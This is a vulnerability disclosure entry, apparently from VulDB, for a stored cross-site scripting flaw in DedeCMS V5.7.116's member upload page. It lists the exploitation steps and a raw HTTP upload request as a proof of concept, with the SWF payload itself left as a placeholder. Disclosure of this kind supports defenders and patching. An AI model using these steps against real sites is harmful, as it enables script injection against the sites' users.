| 제목 | DedeCMS V5.7.116 Cross Site Scripting |
|---|
| 설명 | Summary
DedeCMS V5.7.116 is affected by a stored cross-site scripting vulnerability that can be exploited by an attacker to upload a malicious SWF file, which can lead to XSS attacks. This vulnerability exists due to insufficient input validation and sanitization of user-supplied data.
Details
Log in and go to http://target-ip/member/uploads_add.php to upload the xss payload in .SWF file.
image
Intercept the upload request and change the mediatype parameter in the request to 2.
image
Observe the response, which should include a URL similar to /uploads/userup/1/XXXX.swf.
image
Access the provided URL to trigger the XSS vulnerability.
image
POC
POST /member/uploads_add.php HTTP/1.1
Host: target-ip
Content-Length: 963
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfRghPB9M7esxjc3h
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: [users'cookie]
Connection: keep-alive
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="f"
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="mediatype"
2
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="keyword"
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="dopost"
save
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="title"
123
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="addonfile"; filename="xsstest.swf"
Content-Type: application/x-shockwave-flash
[xss payload in swf]
------WebKitFormBoundaryfRghPB9M7esxjc3h-- |
|---|
| 원천 | ⚠️ https://github.com/Hebing123/cve/issues/77 |
|---|
| 사용자 | jiashenghe (UID 39445) |
|---|
| 제출 | 2024. 11. 27. AM 09:16 (2 연령 ago) |
|---|
| 모더레이션 | 2024. 12. 04. PM 05:31 (7 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 286903 [DedeCMS 5.7.116 SWF File /member/uploads_add.php mediatype 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 20 |
|---|